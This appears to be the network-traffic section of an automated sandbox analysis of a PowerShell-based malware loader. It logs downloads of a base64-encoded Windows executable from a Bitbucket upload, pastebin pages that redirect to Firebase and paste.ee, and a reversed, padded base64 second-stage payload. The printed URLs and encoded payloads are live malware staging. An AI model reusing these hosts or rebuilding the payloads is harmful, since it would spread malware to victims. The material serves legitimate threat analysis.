                                                            Location: https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobK [TRUNCATED]
                                                            Expires: Thu, 03 Oct 2024 04:53:29 GMT
                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                            X-Used-Mesh: False
                                                            Vary: Accept-Language, Origin
                                                            Content-Language: en
                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                            X-Dc-Location: Micros-3
                                                            X-Served-By: 8e5620d07ccd
                                                            X-Version: c0c21fc30b85
                                                            X-Static-Version: c0c21fc30b85
                                                            X-Request-Count: 1715
                                                            X-Render-Time: 0.061300039291381836
                                                            X-B3-Traceid: 17f529b8de2d409aadcb599e8571bd01
                                                            X-B3-Spanid: ef8946490929621e
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.stat [TRUNCATED]
                                                            X-Usage-Quota-Remaining: 999089.629
                                                            X-Usage-Request-Cost: 928.30
                                                            X-Usage-User-Time: 0.027433
                                                            X-Usage-System-Time: 0.000416
                                                            X-Usage-Input-Ops: 0
                                                            X-Usage-Output-Ops: 0
                                                            Age: 0
                                                            X-Cache: MISS
                                                            X-Content-Type-Options: nosniff
                                                            X-Xss-Protection: 1; mode=block
                                                            Atl-Traceid: 17f529b8de2d409aadcb599e8571bd01
                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                            Server-Timing: atl-edge;dur=171,atl-edge-internal;dur=3,atl-edge-upstream;dur=169,atl-edge-pop;desc="aws-eu-central-1"
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.5497243.5.25.834437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:30 UTC1217OUTGET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP [TRUNCATED]
                                                            Host: bbuseruploads.s3.amazonaws.com
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:30 UTC552INHTTP/1.1 200 OK
                                                            x-amz-id-2: E2kER0EQf9qAvQAdwrTTk/3ZVqgTSal8s2om87im37OZ0VY/ffActcISXMb+YxkrbSLKDE9cSDfjN0rA2mJ5DE+tx07Vk5cl
                                                            x-amz-request-id: 1N9SGR8A6MYV9CK3
                                                            Date: Thu, 03 Oct 2024 04:53:31 GMT
                                                            Last-Modified: Thu, 03 Oct 2024 02:55:57 GMT
                                                            ETag: "d56deb4b43b26b748bc2d1b71f2b2745"
                                                            x-amz-server-side-encryption: AES256
                                                            x-amz-version-id: bnHQMdnIBnCcgFolFg0Y53FDW8.EhoTE
                                                            Content-Disposition: attachment; filename="dsadsdsadsadsa.txt"
                                                            Accept-Ranges: bytes
                                                            Content-Type: text/plain
                                                            Server: AmazonS3
                                                            Content-Length: 12972
                                                            Connection: close
                                                            2024-10-03 04:53:30 UTC3452INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4f 34 46 2f 6d 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 34 41 41 41 41 47 41 41 41 41 41 41 41 41 50 6a 77 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAO4F/mYAAAAAAAAAAOAAIiALAVAAAB4AAAAGAAAAAAAAPjwAAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                                            2024-10-03 04:53:30 UTC9520INData Raw: 42 41 41 41 39 41 55 41 41 43 4e 54 64 48 4a 70 62 6d 64 7a 41 41 41 41 41 4f 41 4b 41 41 43 4d 42 67 41 41 49 31 56 54 41 47 77 52 41 41 41 51 41 41 41 41 49 30 64 56 53 55 51 41 41 41 42 38 45 51 41 41 65 41 49 41 41 43 4e 43 62 47 39 69 41 41 41 41 41 41 41 41 41 41 49 41 41 41 46 58 46 51 49 41 43 51 45 41 41 41 42 61 70 41 41 41 46 41 41 41 41 51 41 41 41 43 38 41 41 41 41 45 41 41 41 41 41 67 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 50 77 41 41 41 41 30 41 41 41 41 43 41 41 41 41 41 51 41 41 41 41 4d 41 41 41 41 42 41 41 41 41 41 41 41 44 41 77 45 41 41 41 41 41 41 41 59 41 56 41 55 78 41 77 59 41 6a 41 4d 35 41 41 6f 41 50 77 55 75 42 41 59 41 64 77 4d 78 41 77 6f 41 65 77 56 6a 42 51 59 41 30 51 49 78 41 77 59 41 37 51 49 35 41 41 59 41 72 77 41
                                                            Data Ascii: BAAA9AUAACNTdHJpbmdzAAAAAOAKAACMBgAAI1VTAGwRAAAQAAAAI0dVSUQAAAB8EQAAeAIAACNCbG9iAAAAAAAAAAIAAAFXFQIACQEAAABapAAAFAAAAQAAAC8AAAAEAAAAAgAAAAgAAAAJAAAAPwAAAA0AAAACAAAAAQAAAAMAAAABAAAAAAADAwEAAAAAAAYAVAUxAwYAjAM5AAoAPwUuBAYAdwMxAwoAewVjBQYA0QIxAwYA7QI5AAYArwA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549725104.20.4.2354437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:31 UTC50OUTGET /raw/sFgsbG3v HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-10-03 04:53:31 UTC396INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:31 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 21
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:10 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca54378c95c34a-EWR
                                                            2024-10-03 04:53:31 UTC142INData Raw: 38 38 0d 0a 68 74 74 70 73 3a 2f 2f 66 69 72 65 62 61 73 65 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 76 30 2f 62 2f 72 6f 64 72 69 61 6b 64 2d 38 34 31 33 64 2e 61 70 70 73 70 6f 74 2e 63 6f 6d 2f 6f 2f 50 65 25 32 46 70 2e 74 78 74 3f 61 6c 74 3d 6d 65 64 69 61 26 74 6f 6b 65 6e 3d 61 37 34 30 32 65 33 30 2d 37 33 31 62 2d 34 30 32 61 2d 61 62 36 35 2d 62 34 66 66 62 64 62 65 38 39 30 64 0d 0a
                                                            Data Ascii: 88https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp.txt?alt=media&token=a7402e30-731b-402a-ab65-b4ffbdbe890d
                                                            2024-10-03 04:53:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549727104.20.4.2354437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:34 UTC50OUTGET /raw/cD7bJS7b HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-10-03 04:53:34 UTC396INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:34 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 21
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:13 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca544888a2c457-EWR
                                                            2024-10-03 04:53:34 UTC32INData Raw: 31 61 0d 0a 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 2e 65 65 2f 64 2f 6c 48 62 48 6f 2f 30 0d 0a
                                                            Data Ascii: 1ahttps://paste.ee/d/lHbHo/0
                                                            2024-10-03 04:53:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549728188.114.96.34437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:34 UTC67OUTGET /d/lHbHo/0 HTTP/1.1
                                                            Host: paste.ee
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:35 UTC1204INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:35 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=2592000
                                                            strict-transport-security: max-age=63072000
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1; mode=block
                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jpj9%2FBDeFcTuPUnUAt50EfqJw8%2FE5CkxkRH%2BrBTVJeUff8PrbZkvSvlNvqDIeZBD6OkFD8JCDF3vvQO6mwpyIU8ktG6NgmrnuME7YkGd4S0HOvSyPB4tglguFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cca544c58c743fd-EWR
                                                            2024-10-03 04:53:35 UTC165INData Raw: 66 37 66 0d 0a 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: f7f=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 34 32 62 70 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 6d 5a 70 35 57 59 74 42 69 49 78 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 6b 48 62 69 31 57 5a 7a 4e 58 59 38 6f 51 44 2b 38 6a 49 7a 56 57 65 69 30 54 5a 75 39 47 62 68 52 6d 62 68 52 33 63 67 49 43 4f 74 59 45 56 56 4a 53 50 6e 35 57 61 6b 39 32 59 75 56 47 49 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 43 62 74 68 33 50 38 38 37 75 76 44 41 41 41 41 44 41 75 41 41 4d 41 34 43 41 77 41 67 4c 41 45 44 41 41 41 67 62 41 38 47 41 70 42 77 63 41 49 48 41
                                                            Data Ascii: 42bpNnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzVmZp5WYtBiIxYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegkHbi1WZzNXY8oQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAADAuAAMA4CAwAgLAEDAAAgbA8GApBwcAIHA
                                                            2024-10-03 04:53:35 UTC1071INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 32 30 30 30 0d 0a 42 64 48 6f 45 41 41 53 42 46 44 6f 45 63 30 52 33 42 4b 42 48 6c 48 6f 45 63 59 77 42 50 55 68 67 53 30 61 67 53 45 41 41 49 6b 68 67 52 45 51 41 67 59 67 41 64 77 52 48 63 30 52 46 43 4b 52 72 42 4b 42 48 47 63 77 44 4f 55 4d 67 53 34 41 43 43 55 77 42 4a 45 68 67 53 41 41 49 46 34 51 44 43 4b 52 41 41 59 51 43 43 4b 52 42 43 4b 68 41 48 67 67 44 42 6f 77 41 43 41 67 48 43 6b 66 67 53 55 42 41 65 45 51 41 43 4b 52 46 43 49 51 41 51 4d 68 41 4f 49 51 2b 42 4b 52 46 48 30 61 67 53 30 42 41 41 59 41 41 54 45 51 41 67 55 67 44 42 55 66 67 53 55 68 42 74 47 6f 45 64 67 67 44 64 67 51 72 42 4b 68 44 42 55 66 67 53 55 42 48 49 67 77 42 56 45 55 45 42 46 68 41 43 41 77 42 42 46 42 41 67 51 51 44 42 46 52 41 41 55 67 44 64 4d 51 48 46 44 6f 45
                                                            Data Ascii: 2000BdHoEAASBFDoEc0R3BKBHlHoEcYwBPUhgS0agSEAAIkhgREQAgYgAdwRHc0RFCKRrBKBHGcwDOUMgS4ACCUwBJEhgSAAIF4QDCKRAAYQCCKRBCKhAHggDBowACAgHCkfgSUBAeEQACKRFCIQAQMhAOIQ+BKRFH0agS0BAAYAATEQAgUgDBUfgSUhBtGoEdggDdgQrBKhDBUfgSUBHIgwBVEUEBFhACAwBBFBAgQQDBFRAAUgDdMQHFDoE
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 67 41 41 55 41 41 54 45 67 43 45 41 77 45 43 41 77 45 42 67 68 45 56 59 41 41 54 45 77 42 45 41 67 48 42 6f 41 42 41 34 42 41 42 41 52 42 41 34 68 41 41 34 52 41 48 51 67 44 42 63 77 41 31 43 59 45 56 49 52 41 41 63 51 46 53 45 77 42 45 67 51 41 48 4d 41 48 63 45 41 41 45 49 51 41 48 4d 41 46 53 45 77 42 45 45 68 45 42 63 41 42 49 49 52 41 48 51 41 44 53 45 77 42 45 51 68 45 42 67 68 45 56 59 51 45 53 45 41 47 53 55 68 42 49 49 52 41 59 49 52 46 47 77 67 45 42 67 68 45 56 59 67 50 6b 39 47 61 30 56 57 62 67 51 57 5a 30 46 6d 63 6c 35 57 5a 6e 78 6a 45 6c 42 58 65 55 52 67 44 55 42 51 41 2b 51 32 62 6f 52 58 5a 74 42 43 5a 6c 52 58 59 79 56 6d 62 6c 64 47 50 53 41 51 41 78 49 51 41 42 41 43 42 41 41 41 41 66 39 56 5a 6a 35 57 59 30 4e 6e 62 4a 39 31 58 6c
                                                            Data Ascii: gAAUAATEgCEAwECAwEBghEVYAATEwBEAgHBoABA4BABARBA4hAA4RAHQgDBcwA1CYEVIRAAcQFSEwBEgQAHMAHcEAAEIQAHMAFSEwBEEhEBcABIIRAHQADSEwBEQhEBghEVYQESEAGSUhBIIRAYIRFGwgEBghEVYgPk9Ga0VWbgQWZ0Fmcl5WZnxjElBXeURgDUBQA+Q2boRXZtBCZlRXYyVmbldGPSAQAxIQABACBAAAAf9VZj5WY0NnbJ91Xl
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 43 53 41 41 41 45 77 67 45 41 41 41 42 42 41 41 41 44 51 68 45 42 67 68 45 56 59 77 42 52 49 52 41 59 49 52 46 47 63 41 43 53 45 41 47 53 55 68 42 48 77 67 45 42 67 68 45 56 59 77 42 4a 43 4f 4e 5a 59 46 58 36 64 4c 43 49 41 41 41 44 34 41 41 41 4d 51 41 41 41 79 41 36 6f 51 31 52 38 33 58 2f 41 4c 43 41 6b 4e 42 45 31 68 71 74 4e 4d 6e 4a 31 66 71 46 36 4c 55 4a 6c 4d 41 41 4d 44 41 4d 42 77 4d 41 6b 46 41 45 42 51 52 41 51 45 41 30 41 77 53 41 55 47 41 47 42 41 4f 41 51 46 41 55 42 67 4d 41 63 48 41 6b 42 67 51 41 45 48 41 4a 42 67 59 41 6b 48 41 52 42 77 56 41 34 47 41 31 42 51 57 41 38 45 41 50 42 41 53 41 6f 48 41 59 42 51 55 41 51 45 41 36 42 41 4f 41 4d 44 41 71 42 77 54 41 63 46 41 4b 42 67 62 41 55 47 41 31 42 51 59 41 34 47 41 4c 42 77 56 41 45
                                                            Data Ascii: CSAAAEwgEAAABBAAADQhEBghEVYwBRIRAYIRFGcACSEAGSUhBHwgEBghEVYwBJCONZYFX6dLCIAAAD4AAAMQAAAyA6oQ1R83X/ALCAkNBE1hqtNMnJ1fqF6LUJlMAAMDAMBwMAkFAEBQRAQEA0AwSAUGAGBAOAQFAUBgMAcHAkBgQAEHAJBgYAkHARBwVA4GA1BQWA8EAPBASAoHAYBQUAQEA6BAOAMDAqBwTAcFAKBgbAUGA1BQYA4GALBwVAE
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 41 6f 47 41 34 41 41 4f 41 34 45 41 30 41 51 4f 41 6b 44 41 31 42 77 55 41 4d 45 41 34 42 67 53 41 67 44 41 74 42 51 62 41 63 47 41 4c 42 51 53 41 55 47 41 56 42 41 61 41 6b 47 41 75 42 41 62 41 6b 48 41 71 42 77 4d 41 6b 45 41 4c 42 41 53 41 59 47 41 52 42 67 4e 41 59 46 41 30 42 41 4e 41 49 44 41 45 42 51 51 41 49 46 41 44 42 51 55 41 67 47 41 59 42 77 53 70 43 49 41 41 41 46 41 78 41 67 54 41 51 45 41 76 42 51 63 41 49 44 41 5a 42 67 63 41 77 47 41 53 42 77 53 41 45 45 41 44 42 77 59 41 6b 44 41 46 42 41 4f 41 59 46 41 34 42 67 53 41 63 44 41 57 42 51 64 41 67 45 41 53 42 51 61 41 6f 45 41 72 42 67 4e 41 4d 46 41 36 42 51 56 41 6f 47 41 51 42 77 61 41 55 47 41 59 42 41 57 41 49 44 41 33 42 51 5a 41 49 46 41 6a 42 77 5a 41 67 45 41 74 42 77 63 41 6b 48
                                                            Data Ascii: AoGA4AAOA4EA0AQOAkDA1BwUAMEA4BgSAgDAtBQbAcGALBQSAUGAVBAaAkGAuBAbAkHAqBwMAkEALBASAYGARBgNAYFA0BANAIDAEBQQAIFADBQUAgGAYBwSpCIAAAFAxAgTAQEAvBQcAIDAZBgcAwGASBwSAEEADBwYAkDAFBAOAYFA4BgSAcDAWBQdAgEASBQaAoEArBgNAMFA6BQVAoGAQBwaAUGAYBAWAIDA3BQZAIFAjBwZAgEAtBwcAkH
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 42 77 61 41 55 48 41 69 42 41 63 41 34 47 41 4f 42 51 55 41 6f 46 41 35 42 51 4e 41 63 45 41 77 41 67 64 41 45 46 41 76 42 67 61 41 55 46 41 47 42 51 4f 41 30 47 41 4b 42 41 64 41 49 44 41 68 42 51 53 41 4d 48 41 4f 42 77 4e 41 77 47 41 77 41 51 55 41 41 44 41 77 41 51 57 48 44 49 41 41 67 45 41 73 42 67 4d 41 55 47 41 7a 42 41 52 41 51 47 41 36 42 51 57 41 45 46 41 76 42 41 54 41 6f 47 41 47 42 41 65 41 45 44 41 6f 42 67 63 41 4d 47 41 4d 42 41 65 41 59 46 41 77 42 67 56 41 34 47 41 32 42 77 63 41 6b 44 41 4d 42 67 5a 41 63 47 41 47 42 77 55 41 6f 47 41 36 42 77 4e 41 6f 47 41 47 42 67 61 41 51 44 41 74 42 67 64 41 63 45 41 56 42 51 54 41 77 47 41 58 42 51 61 41 63 47 41 4a 42 41 4d 41 6b 48 41 46 42 41 57 41 34 47 41 79 42 41 4f 41 77 47 41 72 42 67 56
